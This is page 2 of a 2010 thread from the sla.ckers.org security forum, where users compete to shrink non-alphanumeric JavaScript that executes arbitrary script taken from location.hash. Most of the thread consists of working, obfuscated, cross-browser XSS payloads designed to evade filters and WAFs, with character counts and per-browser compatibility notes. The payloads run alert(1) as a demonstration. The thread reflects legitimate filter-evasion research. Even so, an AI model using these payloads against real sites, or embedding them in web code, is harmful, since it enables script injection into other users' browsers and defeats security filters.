Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous12
Current Page: 2 of 2
Re: Diminuitive NonAlNum JS - Arbitrary
Posted by: theharmonyguy
Date: July 22, 2010 12:02PM

OK LeverOne, I think I've gotten 117:

http:// victim.com/#*/alert(1)//javascript:/*xx

_=([µ,ð,,É,,Ñ,,Å]=[ƒ=!'']+ƒ/!ƒ,[[,Á,ª,$,,,ø,,,,Ç]=!ƒ+{}][$+ø+ð+µ])()[ª+ø+Ç+Á+µ+Å+ø+Ñ],_=(_+Á)[$+ª+Å+Ç+É](++ƒ*-ƒ<<ƒ)+_

btw, when I try this style in Firefox, the redirect happens but the new script doesn't actually execute; not sure if it's just a setting of mine or what.

Options: ReplyQuote
Re: Diminuitive NonAlNum JS - Arbitrary
Posted by: LeverOne
Date: July 22, 2010 12:30PM

@theharmonyguy

l=location,l='http://google.com'; // <-- in this issue.

Forget about "slice", use regexp.

http://twitter.com/garethheyes/status/19268049050

============

It was my variant before Gareth's trick.
There remained the last step is to get 103. Let this step will make theharmonyguy.

name='alert(2)';
location.hash='javascript:eval(name)';
W=[[T,R,,,,N,,I]=[F=!'']+F/!F,[,A,L,S,E,,O,,,,C]=!F+{}][S+O+R+T],W()[P=L+O+C+A+T+I+O+N]=(A+W()[P])[S+L+I+C+E](~F+[+F])

----------------------
~Veritas~



Edited 2 time(s). Last edit at 07/22/2010 04:00PM by LeverOne.

Options: ReplyQuote
Re: Diminuitive NonAlNum JS - Arbitrary
Posted by: theharmonyguy
Date: July 22, 2010 12:39PM

*facepalm* I get it now, thanks.

I haven't done much regex, so I started with what I knew... now I know what to study next.

Options: ReplyQuote
Re: Diminuitive NonAlNum JS - Arbitrary
Posted by: theharmonyguy
Date: July 23, 2010 08:21AM

After learning more about regex and seeing .mario's use of it, I got down to 106:
location.hash='javascript:alert(1)';
(æ=([µ,ð,,,,Ñ,,Å]=[ƒ=!'']+ƒ/!ƒ,[[,Á,ª,$,,,ø,,,,Ç]=!ƒ+{}][$+ø+ð+µ])())[_=ª+ø+Ç+Á+µ+Å+ø+Ñ]=/#(.*)/(æ[_])[+ƒ]
At first this was 107, and after reading LeverOne's mention of Gareth's trick, I could only get to 104... and then I realized I had once again left an unnecessary 'e' in, lol.

And that brings us to this (or a version with the parentheses moved around):
// 103

location.hash='javascript:alert(1)';
(æ=([µ,ð,,,,Ñ,,Å]=[ƒ=!'']+ƒ/!ƒ,[[,Á,ª,$,,,ø,,,,Ç]=!ƒ+{}][$+ø+ð+µ])())[_=ª+ø+Ç+Á+µ+Å+ø+Ñ]=/[^#]+$/(æ[_])

Options: ReplyQuote
Re: Diminuitive NonAlNum JS - Arbitrary
Posted by: Gareth Heyes
Date: July 23, 2010 09:09AM

@theharmonyguy

Cool! I'm so glad you are part of the club now. The more crazy non-alphas we get the better

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Diminuitive NonAlNum JS - Arbitrary
Posted by: LeverOne
Date: July 23, 2010 09:18AM

Congrats!
For fun, we can create cross-browser version - it will be in the "old style" and will use

x=[].concat,x()[0].location=...

================

----------------------
~Veritas~



Edited 2 time(s). Last edit at 08/10/2010 09:38AM by LeverOne.

Options: ReplyQuote
Re: Diminuitive NonAlNum JS - Arbitrary
Posted by: Anonymous User
Date: July 23, 2010 10:54AM

Congratulations indeed! I tried several times to break your vector - basically hindered by the fact that white space in the location.hash is being represented by FF as %20 - and not the canonical form of the character.

/ .*/(æ[_])

If that wasn't the case we could have drastically shortened the regex. Chrome does it - but doesn't know destructuring assignment. Meh :)

Nice job!

Options: ReplyQuote
Re: Diminuitive NonAlNum JS - Arbitrary
Posted by: theharmonyguy
Date: July 23, 2010 02:30PM

LeverOne Wrote:
-------------------------------------------------------
> it will be in the "old style"

Heh, I didn't realize that [a,b]="ab" was also Firefox-only... now I know!

Options: ReplyQuote
Re: Diminuitive NonAlNum JS - Arbitrary
Posted by: theharmonyguy
Date: July 23, 2010 03:13PM

Well, I created an initial, non-optimized possible starting point:
// 157

location.hash='javascript:alert(1)';

ð=[_='',Ú=!_+_,$=!!_+_,æ=!_/!!_+_,þ={}+_,µ=Ú[+_],ø=þ[++_],Ñ=æ[_],Á=$[_++],Ç=þ[++_+(--_)]][Ç+ø+Ñ+Ç+Á+µ],(Å=ð()[+[]])[ª=$[_]+ø+Ç+Á+µ+æ[++_]+ø+Ñ]=/[^#]+$/(Å[ª])
However, this one is only Firefox and Chrome (probably Safari) so far, since apparently IE doesn't like the /regexp/() syntax. (No idea what Opera's problem is, and frankly I'm willing to leave it out.) IE is happy with /regexp/['exec'](), but that means getting an 'x', which I'm guessing means /regexp/['constructor'], which I didn't feel like tackling right this minute. :)

Options: ReplyQuote
Re: Diminuitive NonAlNum JS - Arbitrary
Posted by: theharmonyguy
Date: July 23, 2010 09:09PM

OK, I was bored tonight, so I now present a truly cross-browser, non-alphanumeric arbitrary script loader:
// 240

location.hash='javascript:alert(1)';

ð=[_='',Ú=!_+_,$=!!_+_,æ=!_/!!_+_,þ={}+_,µ=Ú[º=+_],Æ=Ú[++_],È=_+_,ø=þ[_],Ñ=æ[_],Á=$[_++],É=Ú[++_],Ó=$[_],Ç=þ[_+È]][Ç+ø+Ñ+Ç+Á+µ],(Å=ð()[º])
[ª=$[È]+ø+Ç+Á+µ+æ[_]+ø+Ñ]=/[^#]+$/[É+(ú=/_/[Ç+ø+Ñ+Ó+µ+Æ+Ú[È]+Ç+µ+ø+Æ]+_)[_/_+[_+(ú[º]==º)]]+É+Ç](Å[ª])

Works in IE8, FF3.6, Chrome5, and Safari4. Does not work in Opera... no idea why (no errors), but given their market share, I don't really care at this point. IE+FF+C+S is good enough for me.

I'm sure LeverOne or .mario will see a way to optimize variables immediately, but I had to start somewhere and now I'm ready for a break. :)

One interesting note: For whatever reason, (/1/['constructor']+'')[0]!='f' in IE. If you try alerting it, the dialog is blank, but from testing I found that (/1/['constructor']+'')[0]==0. Craziness. Anyway, when grabbing 'x' I add 1 using this check so that I get the right character in IE.

Options: ReplyQuote
Re: Diminuitive NonAlNum JS - Arbitrary
Posted by: LeverOne
Date: July 25, 2010 10:51AM

// 193 (IE8,Opera,GC,FF,Saf)

<html><meta http-equiv="X-UA-Compatible" content="IE=8">
<script>

location.hash='*/alert(1)';

W=[A=(X=[D=![]]+D)[++D],N=(Y=D[O=(Z={}+A)[D]]+A)[D++],L=X[D++],E=X[++D],C=Z[++D],T=Z[++D]][C+O+N+C+A+T],((H=W()[+[]])[E+(W+A)[D--*D]+A+L]||H[E+(/\[.*/(W)+A)[D]+A+L])('/*'+H[L+O+C+A+T+Y[D]+O+N])

</script>
</html>

Getting the letter "v": ([].concat+'')[x], x=30 (IE), 29 (FF, Saf), 25 (Opera, Chrome)...

// 172 -->all, including GC 6.0.472.0

location.hash='*/alert(1)//eval';

W=[A=(X=[D=![]]+D)[++D],N=(Y=D/![O=(Z={}+A)[D]]+A)[D++],L=X[D],C=Z[D+++D],T=Z[D+D]][C+O+N+C+A+T],(H=W()[+[]],H[(J='/*'+H[L+O+C+A+T+Y[D]+O+N])[X[D]+L+Y[D]+C+X[-~D]](~D)])(J)

// 170 --> all, except GC 6.0.472.0


location.hash='*/alert(1)//eval';

W=[A=(X=[D=![]]+D)[++D],N=(Y=D/![O=(Z={}+A)[D]]+A)[D++],L=X[D],C=Z[D+++D],T=Z[D+D]][C+O+N+C+A+T],(H=W()[+[]])[(J='/*'+H[L+O+C+A+T+Y[D]+O+N])[X[D]+L+Y[D]+C+X[-~D]](~D)](J)


=============

@theharmonyguy

Nice idea! Reconstructs it!


=============
ok, if nobody else interesting, I'll do it.

// 160

location.hash='*/alert(1)//eval';

W=[Z={}+[],O=Z[D=-~Z],Y=D[X=!D+O]+O,N=O+Y[D],L=X[++D],C=Z[K=D+++D],T=C+X[D/D]+Z[D+D]][C+N+T],(H=W()[+[]],H[(J='/*'+H[L+O+T+Y[K]+N])[X[D]+L+Y[K]+C+Y[D]](~D)])(J)

// 158 (except GC 6.0.472.0 because of his bug)

W=[Z={}+[],O=Z[D=-~Z],Y=D[X=!D+O]+O,N=O+Y[D],L=X[++D],C=Z[K=D+++D],T=C+X[D/D]+Z[D+D]][C+N+T],(H=W()[+[]])[(J='/*'+H[L+O+T+Y[K]+N])[X[D]+L+Y[K]+C+Y[D]](~D)](J)

* and again the url-encoding of hash in FF does not allow us to reduce this code by using a string instead of the comments.

----------------------
~Veritas~



Edited 5 time(s). Last edit at 08/01/2010 06:26PM by LeverOne.

Options: ReplyQuote
Re: Diminuitive NonAlNum JS - Arbitrary
Posted by: theharmonyguy
Date: July 26, 2010 05:50PM

Pretty slick!

One quick trick I see that will shave off 4 characters is to replace T=Z[D+D] with T=C+A+Z[D+D] and then replace the two C+A+T's with just T.

Options: ReplyQuote
Pages: Previous12
Current Page: 2 of 2


Sorry, only registered users may post in this forum.